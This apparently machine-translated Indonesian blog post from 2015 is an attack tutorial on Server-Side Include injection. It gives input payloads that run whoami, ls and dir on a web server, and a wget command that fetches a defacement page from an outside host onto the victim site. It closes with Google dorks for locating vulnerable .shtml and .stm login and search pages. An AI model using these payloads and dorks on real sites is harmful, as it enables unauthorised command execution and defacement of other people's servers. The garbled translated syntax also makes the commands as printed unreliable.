Wednesday, 8 July 2015

Server-Side Termasuk (SSI) Injeksi

Ini adalah serangan web adalah penyerang remote dapat menjalankan perintah di server jarak jauh, SSI Suntikan yang digunakan untuk menjalankan beberapa konten sebelum halaman web adalah dimuat atau sebelum halaman web yang ditampilkan kepada pengguna. SSI dieksploitasi oleh kode mailicious injeksi di halaman web HTML.

SSI Injection adalah sedikit mirip dengan serangan XSS, kita cek website, jika rentan atau tidak dengan mengeksekusi kode / perintah dalam boxs pencarian, header, cookie seperti yang kita lakukan dalam kasus XSS.

Untuk memeriksa situs web, jika rentan terhadap SSI Injection, mencari file dan halaman web seperti ".shtml", ".stm", ".shtm" kemudian masukkan <! - # Echo var = "DATE_LOCAL" -> di kotak pencarian atau di bidang user / password, Setelah mengeksekusi perintah, jika Anda melihat tanggal dan waktu, Anda dapat mengatakan website ini rentan terhadap SSI Injection.

Jika Anda ingin memeriksa pengguna yang berjalan pada penggunaan server ini <! - # Exec cmd = "whoami" -> ini akan memberikan nama pengguna dan rincian yang berjalan di server.
Jika Anda ingin mendapatkan daftar direktori saat ini menggunakan <pre> <! - # Cmd exec = "ls-a" -> </ pre> <! - # Cmd exec = "ls-a" -> </ pre>
Ia bekerja hanya untuk server Linux, untuk server Windows menggunakan <! - # Exec cmd = "dir" ->

 
Anda dapat menambahkan Anda deface halaman terlalu di situs vulnerbale, pertama meng-upload deface Anda pada situs web hosting, terbaik untuk hosting halaman HTML http://www.pastehtml.com  
Sekarang, masukkan kode berikut <! - # Exec cmd = "wget ​​http://website.com/deface.html" -> di kotak pencarian website, atau dalam Username dan Password daerah, setelah eksekusi kode Anda dapat melihat halaman deface Anda di sini http://website.com/deface.html

Dorks untuk Mencari SSI Website Rentan



inurl: bin / Cklb /

inurl: login.shtml
inurl: login.shtm
inurl: login.stm
inurl: search.shtml
inurl: search.shtm
inurl: search.stm
inurl: forgot.shtml
inurl: forgot.shtm
inurl: forgot.stm
inurl: register.shtml
inurl: register.shtm
inurl: register.stm
Halaman login.shtml =: inurl?
Facebook Twitter Google+

 
Back To Top